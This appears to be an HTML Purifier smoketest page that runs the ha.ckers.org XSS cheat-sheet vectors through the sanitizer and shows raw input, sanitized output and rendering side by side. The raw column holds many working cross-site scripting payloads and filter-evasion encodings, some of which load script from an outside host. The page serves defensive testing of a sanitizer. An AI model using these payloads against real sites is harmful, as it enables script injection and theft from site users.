HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.

Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

Name	Raw	Output	Render
XSS Locator	';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//--></S » CRIPT>">'><SCRIPT>alert(Stri » ng.fromCharCode(88,83,83))</ » SCRIPT>=&{}	';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//--> » ">'>=&{}	';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
XSS Quick Test	'';!--"<XSS>=&{()}	'';!--"=&{()}	'';!--"=&{()}
SCRIPT w/Alert()	<SCRIPT>alert('XSS')</SCRIPT » >
SCRIPT w/Source File	<SCRIPT » SRC=http://ha.ckers.org/xss. » js></SCRIPT>
SCRIPT w/Char Code	<SCRIPT>alert(String.fromCha » rCode(88,83,83))</SCRIPT>
BASE	<BASE » HREF="javascript:alert('XSS' » );//">
BGSOUND	<BGSOUND » SRC="javascript:alert('XSS') » ;">
BODY background-image	<BODY » BACKGROUND="javascript:alert » ('XSS');">
BODY ONLOAD	<BODY ONLOAD=alert('XSS')>
DIV background-image 1	<DIV » STYLE="background-image: » url(javascript:alert('XSS')) » ">	<div></div>
DIV background-image 2	<DIV » STYLE="background-image: » url(javascript:alert('XS » S'))">	<div></div>
DIV expression	<DIV STYLE="width: » expression(alert('XSS'));">	<div></div>
FRAME	<FRAMESET><FRAME » SRC="javascript:alert('XSS') » ;"></FRAMESET>
IFRAME	<IFRAME » SRC="javascript:alert('XSS') » ;"></IFRAME>
INPUT Image	<INPUT TYPE="IMAGE" » SRC="javascript:alert('XSS') » ;">
IMG w/JavaScript Directive	<IMG » SRC="javascript:alert('XSS') » ;">
IMG No Quotes/Semicolon	<IMG » SRC=javascript:alert('XSS')>
IMG Dynsrc	<IMG » DYNSRC="javascript:alert('XS » S');">
IMG Lowsrc	<IMG » LOWSRC="javascript:alert('XS » S');">
IMG Embedded commands 1	<IMG » SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">	<img » src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" />
IMG STYLE w/expression	exp/<XSS » STYLE='no\xss:noxss("//"); » xss:ex/XSS///* » /pression(alert("XSS"))'>	exp/*	exp/*
List-style-image	<STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE><UL><LI>XSS	<ul><li>XSS</li></ul>	XSS
IMG w/VBscript	<IMG » SRC='vbscript:msgbox("XSS")' » >
LAYER	<LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER>
Livescript	<IMG » SRC="livescript:[code]">
US-ASCII encoding	scriptalert(XSS)/script »	scriptalert(XSS)/script	scriptalert(XSS)/script
META	<META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');">
META w/data:URL	<META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K">
META w/additional URL parameter	<META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');">
Mocha	<IMG SRC="mocha:[code]">
OBJECT	<OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT>
OBJECT w/Embedded XSS	<OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT>
Embed Flash	<EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED>
STYLE	<STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE>
STYLE w/Comment	<IMG » STYLE="xss:expr/XSS/ession » (alert('XSS'))">
STYLE w/Anonymous HTML	<XSS » STYLE="xss:expression(alert( » 'XSS'))">
STYLE w/background-image	<STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE><A » CLASS=XSS></A>	<a class="XSS"></a>
STYLE w/background	<STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE>
Stylesheet	<LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );">
Remote Stylesheet 1	<LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css">
Remote Stylesheet 2	<STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE>
Remote Stylesheet 3	<META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet">
Remote Stylesheet 4	<STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE>
TABLE	<TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE>
TD	<TABLE><TD » BACKGROUND="javascript:alert » ('XSS')"></TD></TABLE>
XML namespace	<HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML>	<?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS	<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS
XML data island w/CDATA	<XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> </C></X> » </xml><SPAN DATASRC=#I » DATAFLD=C DATAFORMATAS=HTML>	<IMG » SRC="javascript:alert('XSS') » ;"> <span></span>	<IMG SRC="javascript:alert('XSS');">
XML data island w/comment	<XML ID="xss"><I><B><IMG » SRC="javas<!-- » -->cript:alert('XSS')"></B>< » /I></XML> <SPAN » DATASRC="#xss" DATAFLD="B" » DATAFORMATAS="HTML"></SPAN>	<i><b><img src="javas" » alt="javas<!-- » -->cript:alert('XSS')" » /></b></i> <span></span>
XML (locally hosted)	<XML » SRC="http://ha.ckers.org/xss » test.xml" ID=I></XML> <SPAN » DATASRC=#I DATAFLD=C » DATAFORMATAS=HTML></SPAN>	<span></span>
XML HTML+TIME	<HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML>	<?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2">	<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2">
Commented-out Block	<!--[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]-->
Cookie Manipulation	<META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>">
Local .htc file	<XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);">
Rename .js to .jpg	<SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT>
SSI	<!--#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></SCRIPT>'"-->
PHP	<? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>	<? echo('alert("XSS")'); » ?>	<? echo('alert("XSS")'); ?>
JavaScript Includes	<BR SIZE="&{alert('XSS')}">	<br />
Character Encoding Example	< %3C &lt < &LT &LT; &#60 » &#060 &#0060 &#00060 &#000 » 060 &#0000060 < < & » #0060; < < &# » 0000060; &#x3c &#x03c &#x003 » c &#x0003c &#x00003c &#x0000 » 03c < < < » < < &#x000 » 003c; &#X3c &#X03c &#X003c & » #X0003c &#X00003c &#X000003c » &#X3c; &#X03c; &#X003c; &#X » 0003c; &#X00003c; &#X000003c » ; &#x3C &#x03C &#x003C &#x0 » 003C &#x00003C &#x000003C &# » x3C; < < &#x000 » 3C; < &#x000003C; & » #X3C &#X03C &#X003C &#X0003C » &#X00003C &#X000003C &#X3C » ; &#X03C; &#X003C; &#X0003C; » &#X00003C; &#X000003C; \x3c » \x3C \u003c \u003C	< %3C &lt < &L » T &LT; < < < & » lt; < < < < < » < < < < < &l » t; < < < < < » < < < < < &l » t; < < < < < » < < < < < &lt » ; < < < < < » < < < < < &lt » ; < < < < < & » lt; < < < < &lt » ; < \x3c \x3C \u003c \u00 » 3C	< %3C &lt < &LT &LT; < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive	<IMG » SRC=JaVaScRiPt:alert('XSS')>
HTML Entities	<IMG » SRC=javascript:alert("X » SS")>
Grave Accents	<IMG » SRC=`javascript:alert("RSnak » e says, 'XSS'")`>	<img » src="%60javascript%3Aalert(" » alt="`javascript:alert(&quot » ;RSnake" />
Image w/CharCode	<IMG » SRC=javascript:alert(String. » fromCharCode(88,83,83))>
UTF-8 Unicode Encoding	<IMG » SRC=java&# » 115;crip& » #116;:ale& » #114;t('X&# » 83;S')>
Long UTF-8 Unicode w/out Semicolons	<IMG » SRC=&#0000106&#0000097&#0000 » 118&#0000097&#0000115&#00000 » 99&#0000114&#0000105&#000011 » 2&#0000116&#0000058&#0000097 » &#0000108&#0000101&#0000114& » #0000116&#0000040&#0000039&# » 0000088&#0000083&#0000083&#0 » 000039&#0000041>
DIV w/Unicode	<DIV » STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029">	<div></div>
Hex Encoding w/out Semicolons	<IMG » SRC=&#x6A&#x61&#x76&#x61&#x7 » 3&#x63&#x72&#x69&#x70&#x74&# » x3A&#x61&#x6C&#x65&#x72&#x74 » &#x28&#x27&#x58&#x53&#x53&#x » 27&#x29>
UTF-7 Encoding	<HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4-	+ADw-SCRIPT+AD4-alert('XSS' » );+ADw-/SCRIPT+AD4-	+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes	\";alert('XSS');//	\";alert('XSS');//	\";alert('XSS');//
End title tag	</TITLE><SCRIPT>alert("XSS") » ;</SCRIPT>
STYLE w/broken up JavaScript	<STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE>
Embedded Tab	<IMG » SRC="jav\tascript:alert('XSS' » );">	<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
Embedded Encoded Tab	<IMG » SRC="jav ascript:alert( » 'XSS');">	<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
Embedded Newline	<IMG » SRC="jav ascript:alert( » 'XSS');">	<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
Embedded Carriage Return	<IMG » SRC="jav ascript:alert( » 'XSS');">	<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
Multiline w/Carriage Returns	<IMG SRC = " j a v a s c r i » p t : a l e r t ( ' X S S ' » ) " >	<img » src="j%20a%20v%20a%20s%20c%2 » 0r%20i%20p%20t%20%3A%20a%20l » %20e%20r%20t%20(%20'%20X%20S » %20S%20'%20)" alt="j a v a s » c r i p t : a l e r t ( ' X » S" />
Null Chars 1	<IMG » SRC=java\0script:alert("XSS") » >
Null Chars 2	&<SCR\0IPT>alert("XSS")</SCR\0 » IPT>	&	&
Spaces/Meta Chars	<IMG SRC=" » javascript:alert('XSS');">
Non-Alpha/Non-Digit	<SCRIPT/XSS » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Non-Alpha/Non-Digit Part 2	<BODY » onload!#$%&()*~+-_.,:;?@[/\|\ » ]^`=alert("XSS")>
No Closing Script Tag	<SCRIPT » SRC=http://ha.ckers.org/xss. » js
Protocol resolution in script tags	<SCRIPT » SRC=//ha.ckers.org/.j>
Half-Open HTML/JavaScript	<IMG » SRC="javascript:alert('XSS') » "
Double open angle brackets	<IFRAME » SRC=http://ha.ckers.org/scri » ptlet.html <
Extraneous Open Brackets	<<SCRIPT>alert("XSS");//<</S » CRIPT>	<	<
Malformed IMG Tags	<IMG » """><SCRIPT>alert("XSS")</SC » RIPT>">	">	">
No Quotes/Semicolons	<SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT>
Evade Regex Filter 1	<SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Evade Regex Filter 2	<SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Evade Regex Filter 3	<SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Evade Regex Filter 4	<SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Evade Regex Filter 5	<SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Filter Evasion 1	<SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>	PT » SRC="http://ha.ckers.org/xss » .js">	PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2	<SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
IP Encoding	<A » HREF="http://66.102.7.147/"> » XSS</A>	<a » href="http://66.102.7.147/"> » XSS</a>	XSS
URL Encoding	<A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A>	<a>XSS</a>	XSS
Dword Encoding	<A » HREF="http://1113982867/">XS » S</A>	<a href="/">XSS</a>	XSS
Hex Encoding	<A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A>	<a href="/">XSS</a>	XSS
Octal Encoding	<A » HREF="http://0102.0146.0007. » 00000223/">XSS</A>	<a href="/">XSS</a>	XSS
Mixed Encoding	<A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A>	<a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a>	XSS
Protocol Resolution Bypass	<A » HREF="//www.google.com/">XSS » </A>	<a>XSS</a>	XSS
Firefox Lookups 1	<A HREF="//google">XSS</A>	<a href="//google">XSS</a>	XSS
Firefox Lookups 2	<A » HREF="http://ha.ckers.org@go » ogle">XSS</A>	<a » href="http://google">XSS</a>	XSS
Firefox Lookups 3	<A » HREF="http://google:ha.ckers » .org">XSS</A>	<a » href="http://google">XSS</a>	XSS
Removing Cnames	<A » HREF="http://google.com/">XS » S</A>	<a>XSS</a>	XSS
Extra dot for Absolute DNS	<A » HREF="http://www.google.com. » /">XSS</A>	<a>XSS</a>	XSS
JavaScript Link Location	<A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A>	<a>XSS</a>	XSS
Content Replace	<A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A>	<a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a>	XSS